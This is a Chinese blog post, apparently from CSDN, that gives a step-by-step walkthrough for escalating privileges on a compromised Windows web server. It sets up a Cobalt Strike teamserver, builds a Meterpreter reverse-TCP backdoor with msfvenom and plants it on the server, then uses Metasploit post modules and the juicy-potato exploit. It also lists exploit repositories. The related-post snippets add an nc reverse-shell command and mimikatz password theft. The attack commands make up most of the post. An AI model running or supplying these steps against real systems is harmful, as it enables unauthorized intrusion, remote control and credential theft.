权限提升1(windows 手工 MSF CS)

最新推荐文章于 2024-09-30 23:06:47 发布
最新推荐文章于 2024-09-30 23:06:47 发布
阅读量347 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 基础的渗透测试 文章标签: windows 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/129363937
文章详细阐述了在Web环境下进行权限提升的步骤,包括信息收集、选择合适的溢出漏洞、利用工具如CS和MSF创建后门、枚举系统补丁以及查找和利用CVE编号对应的EXP来提权。整个过程涉及操作系统版本、漏洞利用和安全漏洞数据库的查询。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

web权限下提权

权限提升得关键因素:

1、 符合的操作系统

2、 符合的溢出漏洞

常见步骤:

1. 信息收集(操作系统、漏洞补丁、位数、杀软防护、网络、当前权限)

ver

systeminfo

whoami

netstat -ano

tasklist /svc 查看进程,时候有杀软

如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用执行

2. 基于补丁和系统版本来进行筛选可用溢出漏洞EXP

(1) CS

安装JAVA环境,将CS文件包导入Linux,解压之后,chmod +x teamserver ip 密码

sudo ./teamserver 43.143.231.203 test

启动监听器,生成exe,上线

加载插件(巨龙拉) ladon BadPotato (梼杌) 权限提升-juicypotato

(2)MSF

1.启动msf msfconsole

2.生成msf反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=3333 -f exe -o msf.exe

3.use exploit/multi/handler

4.set payload windows/meterpreter/reverse_tcp

5.set lhost 0.0.0.0 //默认所有ip信息都接收

6.set lport 监听端口号

7.run

8.将木马上传至web服务器,执行

9.background 退出当前对话,对话不关闭(可以开启新msf的对话框)

10.use post/windows/gather/enum_patches(半自动:根据漏洞编号找出系统中安装的补丁)

11.set session 1

12.run

13.use post/multi/recon/local_exploit_suggester(全自动:快速识别系统中可能被利用的漏洞)

14.set session 1

15.set showdescription true

16.run

17.use exploit/windows/local/ms16_075_reflection_juicy

18.set session 1

19.exploit

(3) 手工
     寻找存在的cve漏洞

https://github.com/vulmon/Vulmap

1.将vulmap-windows.ps1上传到web服务器,运行即可

https://github.com/bitsadmin/wesng

1.将服务器systeminfo信息存入1.txt

2.python wes.py 1.txt -o vulns.csv

3.查看vulns.csv

https://github.com/chroblert/WindowsVulnScan

1. 将KBCollect.ps1上传到web服务器

2. powershell运行生成json文件,修改json文件的编码格式UTF-8

3. python cve-check.py -C -f KB.json

网站平台寻找cve

https://i.hacking8.com/tiquan

 (4)根据CVE寻找EXP

https://github.com/k8gege/Ladon

https://github.com/Ascotbe/KernelHub

https://github.com/nomi-sec/PoC-in-GitHub

https://github.com/offensive-security/exploitdb

http://cve.mitre.org/data/refs/refmap/source-MS.html

说明:通过对应补丁漏洞编号寻可利用EXP

MS&CVE 关系区别&对应反查

KernelHub 针对常用溢出编号指定找EXP

Poc-in-Github 针对年份及编号指定找EXP

exploitdb 针对类型及关键说明指定找EXP

3. 上传EXP,调用执行去提权

利用MSF进行windows 权限提升
gugonggugong的博客
03-18 515
前提:获取shell msf生成payload 设置监听 利用python开启http服务 win7上访问HTTP服务并执行msf.exe文件 查看监听的会话,出现meterpreter表示监听成功 一、 提高程序运行级别 查看当前用户级别 尝试getsystem直接提权,失败 ...
CSMSF的权限互相传递/mimikatz抓取windows 2012明文密码
qq_68163788的博客
06-26 1773
CS(Cobalt Strike)和MSF(Metasploit Framework)是两种常用的渗透测试工具,用于测试网络安全并获取权限。此外,mimikatz是一款功能强大的工具,可以用于抓取Windows系统中的明文密码。通过修改注册表和等待目标系统管理员重新登录,可以使得明文口令在lsass进程中保存。这样一旦管理员重新登录,mimikatz就可以成功地抓取到明文密码。这些工具在渗透测试和网络安全领域中具有重要的作用。
使用MSF进行提权(windows提权、linux提权、wesng使用
喜欢Python编程的程序员柚柚呀
02-29 1425
安全焦点,其BugTraq是一个出色的漏洞和exploit数据源,可以通过CVE编号,或者产品信息漏洞直接搜索。将刚才生成的 s.exe 文件上传到服务器(靶机)C:\RECYCLER\s.exe 目录(因为一般C:\RECYCLER\ 目录都有读写权限)选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化。如果攻击者对可能导致远程代码执行的漏洞和/或仅具有可用漏洞利用代码的漏洞感兴趣,这将非常有用。为此,可以分别使用​。
metasploit提升权限
星落的博客
05-24 1万+
实例演示-提权 1.获得system账号权限,直接获取会失败,以为win7以上版本电脑含有UAC,因此要绕过UAC。 getsystem 2.使用ask模块进行弹窗,受害人对电脑不了解,点击“是”,从而绕过UAC。 use exploit/windows/local/ask set session 1 run 受害者电脑会进行弹窗,点击允许,就可以提权了。 3.使用bypassuac模块,利用受信任的通过进程注入的发布者证书,他将产生一个关闭UAC标志的shell。 use ..
网络攻防之内网安全横向渗透权限提升
weixin_46626737的博客
06-30 877
schtasks /create /s 目标IP /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F创建对应任务。目标机器:nc 跳板机器IP 端口1 -e /bin/sh(linux)/c:\windows\system32\cmd.exe(windows)(攻击机):./ptunnel -p ip地址(外网机器) -lp 端口(本地端口) -da ip地址(目标。redesktop 127.0.0.1 端口(本地端口)
权限提升WIN篇(腾讯云,CS,MSF
weixin_56537388的博客
09-18 1296
在云服务器搭建msf的目的,因为我们进行渗透测试的目标不可能只在靶机,我们需要一个公网IP来完成,此外,云服务器需要开启相应的端口,否则不能收到反弹shell。如图,CS是一个多人协同的渗透工具,分为客户端和服务端,服务端可以有多个,多个攻击者连接在一个服务器上,共享攻击资源和目标信息,且拥有各种强大的功能。需要说的是,由于没有经过免杀处理,防火墙,杀毒软件等都会导致不能成功获得反弹shell。根据EXP,可以选择手工操作,基于CS的半自动操作,基于MSF的全自动操作。yum安装 openjdk11
Windows权限提升-WIN全平台
网络空间安全学习
03-31 970
windows默认情况下,系统为用户分了7个组,并给每个组赋予不同的操作权限,管理员组(Administrators)、高权限用户组(PowerUsers)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制(Replicator)、来宾用户组(Guests),身份验证用户组(Ahthenticated users)其中备份操作组和文件复制组为维护系统而设置,平时不会被使用。这个成员是系统产生的,真正拥有整台计算机管理权限的账户,一般的操作是无法获取与它等价的权限的。权限提升
mimikatz抓取windows明文密码和csmsf权限传递
m0_65540912的博客
05-25 890
在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。set payload windows/meterpreter/reverse_http(这个payload要跟设置的payload保持一致)这里注销就需要进行强制锁屏,因为是远程,锁屏需要借助脚本来进行,我这里就直接用电脑锁屏演示一下能否抓取明文。修改注册表之后,需注销用户,重新登录才能生效,才能抓取到明文。
权限提升思路总结
最新发布
m0_63615772的博客
09-30 1329
本文章只将思路不讲具体操作前提:已经拿到webshell或者本地用户权限进行权限提升拿到system或者管理员权限文章是对小迪安全2022的权限提升进行整理。
41-渗透测试工具Cobalt strike-2.CS基础使用
XLbb的博客
05-29 2048
在kali中开启使用命令开启metasploit在靶机中使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址(10.0.0.200),端口为Metasploit所监听的端口(7777)。如果有其他的主机上线,在增加会话中选择msf(的端口),该上线主机也能反弹shell这样我们就可以利用metaspliot中的相关工具,进行进一步渗透。
Vulmap:Vulmap在线本地漏洞扫描程序项目
05-07
Vulmap是一个开源的在线本地漏洞扫描程序项目。 它包含适用于WindowsLinux操作系统的联机本地漏洞扫描程序。 这些脚本可用于防御和进攻目的。 可以使用这些脚本进行漏洞评估。 而且,渗透测试人员/红色团队成员可以将它们用于特权升级。 Vulmap可用于扫描localhost上的漏洞,查看相关漏洞并下载。 基本上,使用脚本来扫描本地主机以收集已安装的软件信息,并询问vulmon.com API是否存在与已安装软件相关的漏洞和漏洞。 如果存在漏洞,则Vulmap会提供CVE ID,风险评分,漏洞的详细链接,是否存在相关的利用ID以及利用标题。 漏洞也可以通过Vulmap下载。 Vulmap的主要思想是从Vulmon获取实时漏洞数据,而不是依赖于本地漏洞数据库。 使用这种方法,甚至可以检测到最新的漏洞。 此外,其漏洞利用下载功能有助于特权升级过程。 渗透测试者和红色团队成员可以从
内网渗透-cs上线之提权测试方法
lza20001103的博客
04-14 1415
内网渗透-cs上线之提权测试方法
系统升级 console 加密、提权
chaollllchao的博客
08-08 106
3~15 管理级 用于系统基本运行的命令,对业务提供支撑作用,包括文件系统、FTP、TFTP下载、用户命令级别设置命令;0 参观级 网络诊断(ping\tracert)、从本设备出发访问外部设备的命令(telnet)2 配置级 业务配置命令,路由、各个网络层次的命令。.bin 预加载底层系统相当于bios 系统升级失败,重置密码时用。0~15 共16个级别 缺省最大级别:15级。进入bootroom。
MSFCS之间会话传递,互相派生,版本问题踩坑
qq_29060627的博客
10-12 943
cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是cs4.5不能派生给msf,得换cobaltstrike4.1的版本。
使用MSF进行提权(windows提权、linux提权、wesng使用)
热门推荐
Love&Share
11-22 2万+
文章目录MSF Windows提权反弹shell提权END推荐阅读MSF Linux提权反弹shell补充wesng用法 Metasploit 是一个渗透框架,kali 内安装了,安装位置如下 /usr/share/metasploit-framework 选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化 主要作用:漏洞验证、漏洞利用、内网渗透等 MSF Windows提权 靶机: Win server2003 + iis(已.
Web权限&权限划分
weixin_54882883的博客
08-29 1743
后台或网站权限后的获取途径:后台(修改配置信息功能点),网站权限(查看的配置文件获取),系统中 API 暴露到互联网上会存在一定的安全风险,: 爬虫、恶意访问等等。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。那么权限提升他的意义就是:当前的权限无法满足需要的操作,通过权限提升的技术,提升当前的权限来实现想要的操作。Web权限其实就是网站权限,获取Web权限其实就是获取这个网站的权限。管理员UID为0:系统的管理员用户。...
【内网安全】——Linux提权姿势
Demo不是emo的博客
02-08 6296
Linux提权姿势汇总
权限提升windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2952
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
在网站管理系统上传木马文件 获得服务器权限
rang的博客
09-14 1278
在网站管理系统上传木马 获得服务器权限 1.上传文件 并找到
Shellcode加密分离加载器:MSFCS支持
在描述中提到的“支持msfcs”,指的是该shellcode加载器兼容Metasploit Framework(msf)和 Covenant(cs)。Metasploit是一个流行的渗透测试框架,它提供了一套用于发现安全漏洞的工具。Covenant则是基于.NET的后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值